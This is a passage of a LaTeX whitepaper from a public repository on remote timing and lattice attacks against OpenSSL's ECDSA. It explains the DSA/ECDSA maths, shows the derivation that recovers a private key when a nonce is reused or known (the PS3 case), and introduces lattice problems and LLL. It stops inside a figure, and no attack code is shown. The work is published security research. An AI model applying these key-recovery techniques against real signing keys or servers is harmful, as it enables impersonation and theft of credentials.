-------------------------------------------------------------------------------- https://raw.githubusercontent.com/mimoo/SSL-TLS-ECDSA-timing-attack/2663b8dd419de0505f791fe04292849b3b80eae8/whitepaper.pdf -------------------------------------------------------------------------------- /whitepaper/ecdsa_rfc4492.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mimoo/SSL-TLS-ECDSA-timing-attack/2663b8dd419de0505f791fe04292849b3b80eae8/whitepaper/ecdsa_rfc4492.png -------------------------------------------------------------------------------- /whitepaper/fail.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mimoo/SSL-TLS-ECDSA-timing-attack/2663b8dd419de0505f791fe04292849b3b80eae8/whitepaper/fail.png -------------------------------------------------------------------------------- /whitepaper/nice_web_plot.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mimoo/SSL-TLS-ECDSA-timing-attack/2663b8dd419de0505f791fe04292849b3b80eae8/whitepaper/nice_web_plot.png -------------------------------------------------------------------------------- /whitepaper/ps3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mimoo/SSL-TLS-ECDSA-timing-attack/2663b8dd419de0505f791fe04292849b3b80eae8/whitepaper/ps3.png -------------------------------------------------------------------------------- /whitepaper/rfc5246.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mimoo/SSL-TLS-ECDSA-timing-attack/2663b8dd419de0505f791fe04292849b3b80eae8/whitepaper/rfc5246.png -------------------------------------------------------------------------------- /whitepaper/serverKeyExchange.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/mimoo/SSL-TLS-ECDSA-timing-attack/2663b8dd419de0505f791fe04292849b3b80eae8/whitepaper/serverKeyExchange.png -------------------------------------------------------------------------------- /whitepaper/serverside.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mimoo/SSL-TLS-ECDSA-timing-attack/2663b8dd419de0505f791fe04292849b3b80eae8/whitepaper/serverside.png -------------------------------------------------------------------------------- /whitepaper/serverside_scrambled.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mimoo/SSL-TLS-ECDSA-timing-attack/2663b8dd419de0505f791fe04292849b3b80eae8/whitepaper/serverside_scrambled.png -------------------------------------------------------------------------------- /whitepaper/whitepaper.tex: -------------------------------------------------------------------------------- 1 | \documentclass[a4paper,11pt]{article} 2 | 3 | % fonts 4 | \usepackage[utf8]{inputenc} 5 | %\usepackage[francais]{babel} 6 | 7 | % to get hyphenation on accented words 8 | \usepackage[T1]{fontenc} 9 | 10 | % href 11 | \usepackage{hyperref} 12 | \hypersetup{ 13 | colorlinks=true, 14 | linkcolor=blue, 15 | filecolor=blue, 16 | urlcolor=blue, 17 | bookmarks=true 18 | } 19 | 20 | % code highlighting 21 | \usepackage{minted} 22 | \usemintedstyle{pastie} 23 | 24 | % asm 25 | \usepackage{amsmath} 26 | \usepackage{amssymb} 27 | \usepackage{amsthm} 28 | 29 | % inline code 30 | \usepackage{listings} 31 | \usepackage{xcolor} 32 | 33 | % tables 34 | \usepackage{booktabs} 35 | 36 | % algorithm 37 | \usepackage[]{algorithm2e} 38 | 39 | % for right cases 40 | \newenvironment{rcases} 41 | {\left.\begin{aligned}} 42 | {\end{aligned}\right\rbrace} 43 | 44 | % images 45 | \usepackage{graphicx} 46 | \usepackage{float} 
47 | 48 | % diagrams 49 | \usepackage{tikz} 50 | \usetikzlibrary{matrix} 51 | \usetikzlibrary{positioning} 52 | 53 | % tables 54 | \usepackage{booktabs} 55 | 56 | % no identation 57 | \setlength{\parindent}{0pt} 58 | 59 | % theorem 60 | \newtheorem{definition}{Definition} 61 | \newtheorem{property}{Property} 62 | \newtheorem{theorem}{Theorem} 63 | 64 | % header 65 | \title{Timing and Lattice Attacks on a Remote ECDSA OpenSSL Server: How Practical Are They Really?} 66 | \author{David Wong} 67 | \date{\emph{University of Bordeaux and NCC Group}, \small{September 2015}} 68 | 69 | % 70 | \begin{document} 71 | 72 | \maketitle 73 | 74 | \renewcommand{\abstractname}{Abstract} 75 | \begin{abstract} 76 | In 2011, B.B.Brumley and N.Tuveri found a remote timing attack on OpenSSL's ECDSA implementation for binary curves. We will study if the title of their paper was indeed relevant (Remote Timing Attacks are Still Practical). We improved on their lattice attack using the Embedding Strategy that reduces the Closest Vector Problem to the Shortest Vector Problem so as to avoid using Babai's procedures to solve the CVP and rely on the better experimental results of LLL. We will detail (along with publishing the source code of the tools we used) our attempts to reproduce their experiments from a remote machine located on the same network with the server, and see that such attacks are not trivial and far from being practical. Finally we will see other attacks and countermeasures.\\ 77 | \\ 78 | \textbf{Keywords:} DSA, ECDSA, Timing Attacks, Remote Side-Channel Attacks, OpenSSL, Howgrave-Graham and Smart, B.B.Brumley and N.Tuveri, Hidden Number Problem, Lattices, SVP, CVP, Babai, LLL, BKZ, Embedding Strategy, Short Nonces.\\ 79 | 80 | \end{abstract} 81 | 82 | \section{Introduction}\label{introduction} 83 | 84 | Randomness is an intrinsic part of any cryptosystem. 
It is the source we draw from to generate the secret keys of our Block Ciphers, it is the birthplace of the long keystreams engendered by our Stream Ciphers, the insurance of our Message Authentication Codes and ground zero for our Signatures. Being able to predict the origin of randomness of a cryptosystem will usually break the entirety of it. Using a bad Random Number Generator (\textbf{RNG}) is often the cause of many troubles, this is why nowadays we use the better \textbf{CSPRNGs} (Cryptographically Secure Pseudo Random Number Generators) that enable us to generate random numbers that are not predictable nor reveal any information about the previous random numbers generated (Forward Secrecy). One way of breaking these might be to use a backdoor, like Dual EC\cite{dualec} does, or to leak them through other channels. 85 | 86 | In this paper we will show how these ``Side-Channels'' can sometimes provide enough information to break a cryptosystem. In particular, how the knowledge of a few bits of dozens of nonces revealed by a timing attack can break DSA and ECDSA in applications like OpenSSL. In section 2 we will introduce Cryptographic Signatures with brief explanations on DSA and its Elliptic Curve variant ECDSA. In section 3 we will talk a bit about lattices and the interesting problems they carry, along with the tools past research has invented to solve them (or rather approximate them). In section 4 we will see how Howgrave-Graham and Smart attacked DSA with algorithms based on lattices. We will explain in details a special case of their attack: when the nonces are short, and will talk about improvements by using the Embedding Strategy. In section 5 we will start talking about a timing attack found by B.B.Brumley and N.Tuveri that recovers an OpenSSL server's private key by obtaining some information about the length of the nonces of its ECDSA signatures. 
We will follow by showing how to mount the attack and see how practical it really is according to our own experiments. In section 6 we will talk about related attacks and known counter-measures. Finally we will end the paper with a short conclusion in section 7. In appendix A you will find the C code of the timing part of the attack, in appendix B you will find the Sage code of the lattice part of the attack. Both can be found up to date on \href{https://github.com/mimoo/timing_attack_ecdsa_tls}{the public repository associated to this paper}. 87 | 88 | \section{Cryptographic Signatures}\label{rsa} 89 | 90 | 91 | One of the greatest tools cryptography has provided us in the modern era is the ability to digitally sign things. Like a real signature is ``supposed'' to attest you wrote that check, a digital signature over a digital object can attest it came from you. Actually a digital signature does much more: it \textbf{authenticate} the object (it came from you), it provides \textbf{integrity} (it has not been modified) and also \textbf{non-repudiation} (you cannot lie afterward about not having signed anything!). 92 | 93 | \subsection{DSA}\label{dsa} 94 | 95 | The Digital Signature Algorithm, commonly referred as DSA or even DSS (the same way Rijandel is referred to as AES), is one of the most used signature algorithms in the world. It is a variant of Schnorr's Signature\cite{schnorr} published by the NSA to circumvent the first one's patents. Based on Non-Interactive Zero-Knowledge Protocols and Public-Key Cryptography, it is pretty simple to state. You own two keys: a public key and a private key. You sign with your private key and people can verify your signature thanks to your public key which is... public. 96 | 97 | \begin{align*} 98 | &x \text{ the private key} \\ 99 | &(p, q, g, y) \text{ the public key with } y = g^x \pmod{p} 100 | \end{align*} 101 | 102 | We will not go into the details of how to generate a pair of private and public key. 
A signature over a message consists of two integers $r$ and $s$ that you can compute with a hash of the message, your private key, the public key and an \textbf{ephemeral private key} $k$. 103 | 104 | \begin{align*} 105 | &r = (g^k \pmod{p}) \pmod{q}\\ 106 | &s = k^{-1} ( H(m) + x r ) \pmod{q} 107 | \end{align*} 108 | 109 | Every time you want to sign something you must generate a new ephemeral private key $k$ in addition to your long term private key $x$. This is why we also call it a nonce as it is a \textbf{n}umber that has to be used only \textbf{once}. 110 | 111 | The verification part is pretty straight forward: take the elements from the signature and from the public key and compute: 112 | 113 | $$ (g^{H(m) (s^{-1} \pmod{q})} \cdot g^{r (s^{-1} \pmod{q}) \pmod{q}} \pmod{p}) \pmod{q} $$ 114 | 115 | Check if it's equal to $r$. If so, the signature is valid. 116 | 117 | \subsection{ECDSA}\label{ecdsa} 118 | 119 | ECDSA, a more modern variant of DSA based on \textbf{Elliptic Curves}, was invented in 1992 by Scott Vanstone in response to NIST's Request For Comment on their DSA\cite{ecdsa}. It carries better security assumptions and is more efficient than DSA due to smaller key sizes. It has been slowly replacing it over the years. 120 | 121 | DSA is based on the \textbf{Discrete Logarithm Problem} (DLP) in prime-order subgroups of $\mathbb{Z}^{\ast}_p$. The fact that given $y = g^x \pmod{p}$ with $g$ an element of the multiplicative group $\mathbb{Z}_{p}^{\ast}$ ($p$ prime), it is \emph{hard} to compute the integer $x$. 
This problem can be found in other kinds of groups, like the one we define with Elliptic Curves; it is then called the \textbf{Elliptic Curve Discrete Logarithm Problem} or ECDLP in some of the fields.\\ 122 | 123 | Elliptic Curves are just some kind of curves usually defined as the points satisfying the \textbf{Weierstraß' equation}: 124 | 125 | $$ y^2 + a_1xy + a_3y = x^3 + a_2x^2 + a_4x + a_6 $$ 126 | \newpage 127 | Although in our case, ECDSA only works on Weierstrass curves, which are a particular subset of elliptic curves that can be written with the \textbf{short Weierstraß' equation}: 128 | 129 | $$ y^2 = x^3 - 3x + b $$ 130 | 131 | That set of points over a field $K$ along with a point $\mathcal{O}$ serving as the identity and called the \textit{point at infinity} forms an abelian group called \textbf{the elliptic curve group}. This group has two operations, addition and multiplication, which are defined following a \textit{chord-and-tangent rule}. The multiplication of a scalar $k$ with a point $P$ from the curve is usually written as $Q = [k]P$. The ECDLP is stated as follows: it is computationally hard to compute $k$ if you only know $Q$ and $P$ in the above equation (and if they are big enough).\\ 132 | 133 | The main advantage of ECDLP over DLP is that the most efficient attacks on DLP (\textit{Index Calculus} attacks like the \textbf{General Number Field Sieve}) do not work for ECDLP. Keys in Elliptic Curve based algorithms are also much smaller than their counterparts based on the conventional Discrete Logarithm Problem, which allows for faster calculations and smaller certificates for equivalent levels of security\cite{vanstone}. 134 | 135 | ECDSA carries the same principles as DSA. The public key comprises all the public parameters of the curve of our choice and a public key $Q = [x]P$ which is a random multiple $x$ of the base point $P$ where $x$ is also the private key. 
136 | 137 | \begin{align*} 138 | &r = ([k]P)_x \pmod{q}\\ 139 | &s = k^{-1} ( H(m) + x r ) \pmod{q} 140 | \end{align*} 141 | 142 | Pay attention to the scalar multiplication in the first part $r$ of the signature. This is the part that we will later talk about. 143 | 144 | \subsection{Security of DSA/ECDSA}\label{security_dsa_ecdsa} 145 | 146 | The security of DSA and ECDSA is often grossly reduced to the Discrete Logarithm Problem, while it should be tied to every piece of information contained in their equations. 147 | 148 | Taking a look at the public part $(r, s)$ of an ECDSA signature: 149 | \begin{align*} 150 | &r = ([k]P)_x \pmod{q}\\ 151 | &s = k^{-1} ( H(m) + x r ) \pmod{q} 152 | \end{align*} 153 | \newpage 154 | You can see in the second equation that knowing the nonce $k$ allows you to easily recover the private key $x$ (total break): 155 | 156 | $$ 157 | x = [ s k - H(m) ] \cdot r^{-1} \pmod{q} 158 | $$ 159 | 160 | An example of a misunderstanding of this concept is the PS3 nonce \textbf{re-use} in 2010\cite{ps3} where a team of researchers reversed the nonce generation part of the PS3 signing algorithm to realize that it was not totally random. 
161 | 162 | \begin{figure}[H] 163 | \includegraphics[width=\textwidth]{ps3.png} 164 | \caption{The relevant slide from the \href{https://events.ccc.de/congress/2010/Fahrplan/attachments/1780_27c3_console_hacking_2010.pdf}{Chaos Communication Congress talk revealing the vulnerability}} 165 | \end{figure} 166 | 167 | You can see that reusing the same nonce only twice already leads to a break of the key: 168 | 169 | \begin{align*} 170 | &\begin{cases} 171 | s_1 = k^{-1} ( H(m_1) + x r ) \pmod{q}\\ 172 | s_2 = k^{-1} ( H(m_2) + x r ) \pmod{q} 173 | \end{cases}\\ 174 | \implies& s_1 - s_2 = k^{-1} ( H(m_1) - H(m_2) ) \pmod{q}\\ 175 | \implies& k = (H(m_1) - H(m_2)) (s_1 - s_2)^{-1} \pmod{q} 176 | \end{align*} 177 | 178 | Nonces being uniformly generated from huge sets make the probability of generating the same nonce twice \textbf{mathematically negligible}. But we will see that we need less information than that. Some subtle information on the nonces, like their \textbf{binary size}, can rapidly lead to the same total break. 179 | 180 | \section{Lattices} 181 | 182 | The attacks we will describe later both make use of lattices and the tools they carry. Hence it is necessary for us to understand what is a lattice and what algorithms based on lattices will be useful for us.\\ 183 | Think about Lattices like \textbf{Vector Spaces}. Imagine a simple vector space of two vectors. 
You can add them together, multiply them by scalars (let's say numbers of $\mathbb{R}$) and it spans a vector space.\\ 184 | 185 | \begin{tikzpicture}[scale=.55] 186 | \draw [lightgray] [<->] (0,5) -- (10,5); 187 | \draw [lightgray] [<->] (5,10) -- (5,0); 188 | \draw [thick,purple] [->] (5,5) -- (6, 8); 189 | \draw [thick,purple] [->] (5,5) -- (6, 6); 190 | 191 | \draw [thick,black] [->] (11,5) -- (12,5); 192 | 193 | %\path [fill=purple] (18,5) to (20.5,10) to (23,10) to (18,5); 194 | \path [fill=purple] (13,0) to (23,0) to (23,10) to (13,10); 195 | \draw [white,thick] [<->] (13,5) -- (23,5); 196 | \draw [white,thick] [<->] (18,10) -- (18,0); 197 | \end{tikzpicture}\\ 198 | 199 | Now imagine that our vector space's \textbf{scalars are the integers}, taken in $\mathbb{Z}$. The space spanned by the vectors is now made out of points. It's \textbf{discrete}. Meaning that for any point of this lattice there exists a ball centered around that point of radius different from zero that contains only that point. 
Nothing else.\\ 200 | 201 | \begin{figure}[H] 202 | \centering 203 | \begin{tikzpicture}[scale=.5] 204 | \draw [lightgray] [<->] (0,5) -- (10,5); 205 | \draw [lightgray] [<->] (5,10) -- (5,0); 206 | 207 | \draw [fill,purple] (9,1) circle [radius=0.1]; 208 | 209 | \draw [fill,purple] (7,1) circle [radius=0.1]; 210 | \draw [fill,purple] (8,2) circle [radius=0.1]; 211 | \draw [fill,purple] (9,3) circle [radius=0.1]; 212 | 213 | \draw [fill,purple] (5,1) circle [radius=0.1]; 214 | \draw [fill,purple] (6,2) circle [radius=0.1]; 215 | \draw [fill,purple] (7,3) circle [radius=0.1]; 216 | \draw [fill,purple] (8,4) circle [radius=0.1]; 217 | \draw [fill,purple] (9,5) circle [radius=0.1]; 218 | 219 | \draw [fill,purple] (3,1) circle [radius=0.1]; 220 | \draw [fill,purple] (4,2) circle [radius=0.1]; 221 | \draw [fill,purple] (5,3) circle [radius=0.1]; 222 | \draw [fill,purple] (6,4) circle [radius=0.1]; 223 | \draw [fill,purple] (7,5) circle [radius=0.1]; 224 | \draw [fill,purple] (8,6) circle [radius=0.1]; 225 | \draw [fill,purple] (9,7) circle [radius=0.1]; 226 | 227 | \draw [fill,purple] (1,1) circle [radius=0.1]; 228 | \draw [fill,purple] (2,2) circle [radius=0.1]; 229 | \draw [fill,purple] (3,3) circle [radius=0.1]; 230 | \draw [fill,purple] (4,4) circle [radius=0.1]; 231 | \draw [fill,purple] (5,5) circle [radius=0.1]; 232 | \draw [fill,purple] (6,6) circle [radius=0.1]; 233 | \draw [fill,purple] (7,7) circle [radius=0.1]; 234 | \draw [fill,purple] (8,8) circle [radius=0.1]; 235 | \draw [fill,purple] (9,9) circle [radius=0.1]; 236 | 237 | \draw [fill,purple] (1,3) circle [radius=0.1]; 238 | \draw [fill,purple] (2,4) circle [radius=0.1]; 239 | \draw [fill,purple] (3,5) circle [radius=0.1]; 240 | \draw [fill,purple] (4,6) circle [radius=0.1]; 241 | \draw [fill,purple] (5,7) circle [radius=0.1]; 242 | \draw [fill,purple] (6,8) circle [radius=0.1]; 243 | \draw [fill,purple] (7,9) circle [radius=0.1]; 244 | 245 | \draw [fill,purple] (1,5) circle [radius=0.1]; 246 | \draw 
[fill,purple] (2,6) circle [radius=0.1]; 247 | \draw [fill,purple] (3,7) circle [radius=0.1]; 248 | \draw [fill,purple] (4,8) circle [radius=0.1]; 249 | \draw [fill,purple] (5,9) circle [radius=0.1]; 250 | 251 | \draw [fill,purple] (1,7) circle [radius=0.1]; 252 | \draw [fill,purple] (2,8) circle [radius=0.1]; 253 | \draw [fill,purple] (3,9) circle [radius=0.1]; 254 | 255 | \draw [fill,purple] (1,9) circle [radius=0.1]; 256 | \end{tikzpicture} 257 | \end{figure} 258 | 259 | Lattices are interesting in cryptography because we seldom deal with real numbers and they bring us a lot of tools to deal with integers. 260 | 261 | Just as vector spaces, lattices can also be described by different bases represented as \textbf{matrices}. 262 | 263 | Lattices come with their sets of hard problems, and in our interest their respective approximation-to-a-solution tools. 264 | 265 | \subsection{Shortest Vector Problem} 266 | 267 | One of the most famous lattice problems thought to be hard is the \textbf{SVP} or Shortest Vector Problem. It states that given a lattice basis, you have to find the shortest non-zero vector in the lattice. 268 | 269 | \begin{figure}[H] 270 | \centering 271 | \begin{tikzpicture}[scale=1] 272 | 273 | 274 | \begin{scope}[scale=.55,local bounding box=scope1] 275 | \coordinate (Origin) at (0,0); 276 | \coordinate (XAxisMin) at (-5,0); 277 | \coordinate (XAxisMax) at (5,0); 278 | \coordinate (YAxisMin) at (0,-5); 279 | \coordinate (YAxisMax) at (0,5); 280 | \draw [thin, black!40, <->] (XAxisMin) -- (XAxisMax);% Draw x axis 281 | \draw [thin, black!40,<->] (YAxisMin) -- (YAxisMax);% Draw y axis 282 | %\draw[style=help lines,dashed,black!20] (-5,-5) grid[step=1cm] (5,5); 283 | 284 | 285 | \begin{scope} 286 | \clip (-5,-5) rectangle (5,5); % Clips the picture... 
287 | \pgftransformcm{1}{0.6}{0.7}{1}{\pgfpoint{0cm}{0cm}} 288 | 289 | % setup the nodes 290 | \foreach \x in {-15,...,15} 291 | \foreach \y in {-15,...,15} 292 | { 293 | \node[shape=circle,fill=black!45,scale=0.35] (\x-\y) at (2*\x,\y+3){}; 294 | } 295 | \end{scope} 296 | 297 | 298 | \end{scope} 299 | 300 | \begin{scope}[scale=.55,shift={(12,0)}] 301 | \coordinate (Origin) at (0,0); 302 | \coordinate (XAxisMin) at (-5,0); 303 | \coordinate (XAxisMax) at (5,0); 304 | \coordinate (YAxisMin) at (0,-5); 305 | \coordinate (YAxisMax) at (0,5); 306 | \draw [thin, black!40, <->] (XAxisMin) -- (XAxisMax);% Draw x axis 307 | \draw [thin, black!40,<->] (YAxisMin) -- (YAxisMax);% Draw y axis 308 | \draw [thin, purple,->] (0,0) -- (-.5,.7); 309 | %\draw[style=help lines,dashed,black!20] (-5,-5) grid[step=1cm] (5,5); 310 | 311 | 312 | \begin{scope} 313 | \clip (-5,-5) rectangle (5,5); % Clips the picture... 314 | \pgftransformcm{1}{0.6}{0.7}{1}{\pgfpoint{0cm}{0cm}} 315 | 316 | % setup the nodes 317 | \foreach \x in {-15,...,15} 318 | \foreach \y in {-15,...,15} 319 | { 320 | \node[shape=circle,fill=black!45,scale=0.35] (\x-\y) at (2*\x,\y+3){}; 321 | } 322 | \end{scope} 323 | 324 | % our little node 325 | \node[shape=circle,fill=purple,scale=0.35] at (-.6,.8){}; 326 | 327 | \end{scope} 328 | 329 | \end{tikzpicture} 330 | \caption{To solve the SVP problem find the shortest lattice vector in that lattice} 331 | \end{figure} 332 | 333 | This problem might seem obvious in the example, but lattice basis are rarely optimal and in more dimensions and/or with a bigger basis it quickly becomes problematic to solve the SVP. 334 | 335 | \subsection{Closest Vector Problem} 336 | 337 | Another interesting problem in lattices is the \textbf{CVP} or Closest Vector Problem, where given a lattice basis and a non-lattice vector you have to find the closest lattice vector to it. 
338 | 339 | \begin{figure}[H] 340 | \centering 341 | \begin{tikzpicture}[scale=1] 342 | 343 | 344 | \begin{scope}[scale=.55,local bounding box=scope1] 345 | \coordinate (Origin) at (0,0); 346 | \coordinate (XAxisMin) at (-5,0); 347 | \coordinate (XAxisMax) at (5,0); 348 | \coordinate (YAxisMin) at (0,-5); 349 | \coordinate (YAxisMax) at (0,5); 350 | \draw [thin, black!40, <->] (XAxisMin) -- (XAxisMax);% Draw x axis 351 | \draw [thin, black!40,<->] (YAxisMin) -- (YAxisMax);% Draw y axis 352 | %\draw[style=help lines,dashed,black!20] (-5,-5) grid[step=1cm] (5,5); 353 | 354 | 355 | \begin{scope} 356 | \clip (-5,-5) rectangle (5,5); % Clips the picture... 357 | \pgftransformcm{1}{0.6}{0.7}{1}{\pgfpoint{0cm}{0cm}} 358 | 359 | % setup the nodes 360 | \foreach \x in {-15,...,15} 361 | \foreach \y in {-15,...,15} 362 | { 363 | \node[shape=circle,fill=black!45,scale=0.35] (\x-\y) at (2*\x,\y+3){}; 364 | } 365 | \end{scope} 366 | 367 | % our little node 368 | \node[shape=circle,fill=purple,scale=0.4] at (2.5,3.4){}; 369 | \node[shape=circle,draw=purple,fill=none,scale=0.8] at (2.5,3.4){}; 370 | 371 | 372 | \end{scope} 373 | 374 | \begin{scope}[scale=.55,shift={(12,0)}] 375 | \coordinate (Origin) at (0,0); 376 | \coordinate (XAxisMin) at (-5,0); 377 | \coordinate (XAxisMax) at (5,0); 378 | \coordinate (YAxisMin) at (0,-5); 379 | \coordinate (YAxisMax) at (0,5); 380 | \draw [thin, black!40, <->] (XAxisMin) -- (XAxisMax);% Draw x axis 381 | \draw [thin, black!40,<->] (YAxisMin) -- (YAxisMax);% Draw y axis 382 | %\draw[style=help lines,dashed,black!20] (-5,-5) grid[step=1cm] (5,5); 383 | 384 | 385 | \begin{scope} 386 | \clip (-5,-5) rectangle (5,5); % Clips the picture... 
387 | \pgftransformcm{1}{0.6}{0.7}{1}{\pgfpoint{0cm}{0cm}} 388 | 389 | % setup the nodes 390 | \foreach \x in {-15,...,15} 391 | \foreach \y in {-15,...,15} 392 | { 393 | \node[shape=circle,fill=black!45,scale=0.35] (\x-\y) at (2*\x,\y+3){}; 394 | } 395 | \end{scope} 396 | 397 | % our little node 398 | \node[shape=circle,fill=purple!60,scale=0.4] at (2.5,3.4){}; 399 | \node[shape=circle,fill=purple,scale=0.4] at (2.1,3){}; 400 | \node[shape=circle,fill=none,draw=purple,scale=0.8] at (2.1,3){}; 401 | 402 | \end{scope} 403 | 404 | \end{tikzpicture} 405 | \caption{To solve the CVP problem you need to find the closest lattice vector to that non-lattice purple vector} 406 | \end{figure} 407 | 408 | Interestingly, The CVP is a generalization of the SVP. The reduction is pretty easy, although not obvious since asking for the closest lattice vector to $0$ would be $0$. This will be left as an exercise for the reader. 409 | 410 | \subsection{LLL} 411 | 412 | 413 | The \textbf{Lenstra–Lenstra–Lovász} \textit{lattice basis reduction algorithm} is a step by step calculus that reduces a lattice basis in polynomial time. The lattice is left unchanged but the row vectors of its new basis are ``\textbf{smaller}'' and nearly orthogonal to one another. Here's the real definitions: 414 | 415 | \begin{definition} 416 | Let $L$ be a lattice with a basis $B$. 
The $\delta$-LLL algorithm applied on $L$'s basis $B$ produces a new basis of $L$: $B' = \{b_1,\hdots,b_n\}$ satisfying: 417 | \begin{eqnarray} 418 | \forall \hspace{1mm} 1 \leq j < i \leq n \text{ we have } |\mu_{i,j}| \leq \frac{_1}{^2}\\ 419 | \forall \hspace{1mm} 1 \leq i < n \text{ we have } \delta \cdot \|\tilde{b_i}\|^2 \leq \| \mu_{i+1,i}\cdot \tilde{b}_i + \tilde{b}_{i + 1}\|^2 420 | \end{eqnarray} 421 | \begin{center} 422 | with $\mu_{i,j} = \frac{b_i \cdot \tilde{b}_j}{\tilde{b}_j \cdot \tilde{b}_j}$ and $\tilde{b}_1 = b_1$ (Gram-Schmidt) 423 | \end{center} 424 | \end{definition} 425 | 426 | \begin{tikzpicture}[scale=.55] 427 | \node [above] at (5,10) {\textbf{random basis}}; 428 | \node [above] at (18,10) {\textbf{reduced basis}}; 429 | \draw [lightgray] [<->] (0,5) -- (10,5); 430 | \draw [lightgray] [<->] (5,10) -- (5,0); 431 | 432 | \draw [fill,purple,opacity=.4] (9,1) circle [radius=0.1]; 433 | 434 | \draw [fill,purple,opacity=.4] (7,1) circle [radius=0.1]; 435 | \draw [fill,purple,opacity=.4] (8,2) circle [radius=0.1]; 436 | \draw [fill,purple,opacity=.4] (9,3) circle [radius=0.1]; 437 | 438 | \draw [fill,purple,opacity=.4] (5,1) circle [radius=0.1]; 439 | \draw [fill,purple,opacity=.4] (6,2) circle [radius=0.1]; 440 | \draw [fill,purple,opacity=.4] (7,3) circle [radius=0.1]; 441 | \draw [fill,purple,opacity=.4] (8,4) circle [radius=0.1]; 442 | \draw [fill,purple,opacity=.4] (9,5) circle [radius=0.1]; 443 | 444 | \draw [fill,purple,opacity=.4] (3,1) circle [radius=0.1]; 445 | \draw [fill,purple,opacity=.4] (4,2) circle [radius=0.1]; 446 | \draw [fill,purple,opacity=.4] (5,3) circle [radius=0.1]; 447 | \draw [fill,purple,opacity=.4] (6,4) circle [radius=0.1]; 448 | \draw [fill,purple,opacity=.4] (7,5) circle [radius=0.1]; 449 | \draw [fill,purple,opacity=.4] (8,6) circle [radius=0.1]; 450 | \draw [fill,purple,opacity=.4] (9,7) circle [radius=0.1]; 451 | 452 | \draw [fill,purple,opacity=.4] (1,1) circle [radius=0.1]; 453 | \draw 
[fill,purple,opacity=.4] (2,2) circle [radius=0.1]; 454 | \draw [fill,purple,opacity=.4] (3,3) circle [radius=0.1]; 455 | \draw [fill,purple,opacity=.4] (4,4) circle [radius=0.1]; 456 | \draw [fill,purple,opacity=.4] (5,5) circle [radius=0.1]; 457 | \draw [fill,purple,opacity=.4] (6,6) circle [radius=0.1]; 458 | \draw [fill,purple,opacity=.4] (7,7) circle [radius=0.1]; 459 | \draw [fill,purple,opacity=.4] (8,8) circle [radius=0.1]; 460 | \draw [fill,purple,opacity=.4] (9,9) circle [radius=0.1]; 461 | 462 | \draw [fill,purple,opacity=.4] (1,3) circle [radius=0.1]; 463 | \draw [fill,purple,opacity=.4] (2,4) circle [radius=0.1]; 464 | \draw [fill,purple,opacity=.4] (3,5) circle [radius=0.1]; 465 | \draw [fill,purple,opacity=.4] (4,6) circle [radius=0.1]; 466 | \draw [fill,purple,opacity=.4] (5,7) circle [radius=0.1]; 467 | \draw [fill,purple,opacity=.4] (6,8) circle [radius=0.1]; 468 | \draw [fill,purple,opacity=.4] (7,9) circle [radius=0.1]; 469 | 470 | \draw [fill,purple,opacity=.4] (1,5) circle [radius=0.1]; 471 | \draw [fill,purple,opacity=.4] (2,6) circle [radius=0.1]; 472 | \draw [fill,purple,opacity=.4] (3,7) circle [radius=0.1]; 473 | \draw [fill,purple,opacity=.4] (4,8) circle [radius=0.1]; 474 | \draw [fill,purple,opacity=.4] (5,9) circle [radius=0.1]; 475 | 476 | \draw [fill,purple,opacity=.4] (1,7) circle [radius=0.1]; 477 | \draw [fill,purple,opacity=.4] (2,8) circle [radius=0.1]; 478 | \draw [fill,purple,opacity=.4] (3,9) circle [radius=0.1]; 479 | 480 | \draw [fill,purple,opacity=.4] (1,9) circle [radius=0.1]; 481 | 482 | % 483 | \draw [thick,black] [->] (11,5) -- (12,5); 484 | \node [above] at (11.5,5) {$_{LLL}$}; 485 | % 486 | 487 | \draw [lightgray] [<->] (13,5) -- (23,5); 488 | \draw [lightgray] [<->] (18,10) -- (18,0); 489 | 490 | \draw [fill,purple,opacity=.4] (22,1) circle [radius=0.1]; 491 | 492 | \draw [fill,purple,opacity=.4] (20,1) circle [radius=0.1]; 493 | \draw [fill,purple,opacity=.4] (21,2) circle [radius=0.1]; 494 | \draw 
[fill,purple,opacity=.4] (22,3) circle [radius=0.1]; 495 | 496 | \draw [fill,purple,opacity=.4] (18,1) circle [radius=0.1]; 497 | \draw [fill,purple,opacity=.4] (19,2) circle [radius=0.1]; 498 | \draw [fill,purple,opacity=.4] (20,3) circle [radius=0.1]; 499 | \draw [fill,purple,opacity=.4] (21,4) circle [radius=0.1]; 500 | \draw [fill,purple,opacity=.4] (22,5) circle [radius=0.1]; 501 | 502 | \draw [fill,purple,opacity=.4] (16,1) circle [radius=0.1]; 503 | \draw [fill,purple,opacity=.4] (17,2) circle [radius=0.1]; 504 | \draw [fill,purple,opacity=.4] (18,3) circle [radius=0.1]; 505 | \draw [fill,purple,opacity=.4] (19,4) circle [radius=0.1]; 506 | \draw [fill,purple,opacity=.4] (20,5) circle [radius=0.1]; 507 | \draw [fill,purple,opacity=.4] (21,6) circle [radius=0.1]; 508 | \draw [fill,purple,opacity=.4] (22,7) circle [radius=0.1]; 509 | 510 | \draw [fill,purple,opacity=.4] (14,1) circle [radius=0.1]; 511 | \draw [fill,purple,opacity=.4] (15,2) circle [radius=0.1]; 512 | \draw [fill,purple,opacity=.4] (16,3) circle [radius=0.1]; 513 | \draw [fill,purple,opacity=.4] (17,4) circle [radius=0.1]; 514 | \draw [fill,purple,opacity=.4] (18,5) circle [radius=0.1]; 515 | \draw [fill,purple,opacity=.4] (19,6) circle [radius=0.1]; 516 | \draw [fill,purple,opacity=.4] (20,7) circle [radius=0.1]; 517 | \draw [fill,purple,opacity=.4] (21,8) circle [radius=0.1]; 518 | \draw [fill,purple,opacity=.4] (22,9) circle [radius=0.1]; 519 | 520 | \draw [fill,purple,opacity=.4] (14,3) circle [radius=0.1]; 521 | \draw [fill,purple,opacity=.4] (15,4) circle [radius=0.1]; 522 | \draw [fill,purple,opacity=.4] (16,5) circle [radius=0.1]; 523 | \draw [fill,purple,opacity=.4] (17,6) circle [radius=0.1]; 524 | \draw [fill,purple,opacity=.4] (18,7) circle [radius=0.1]; 525 | \draw [fill,purple,opacity=.4] (19,8) circle [radius=0.1]; 526 | \draw [fill,purple,opacity=.4] (20,9) circle [radius=0.1]; 527 | 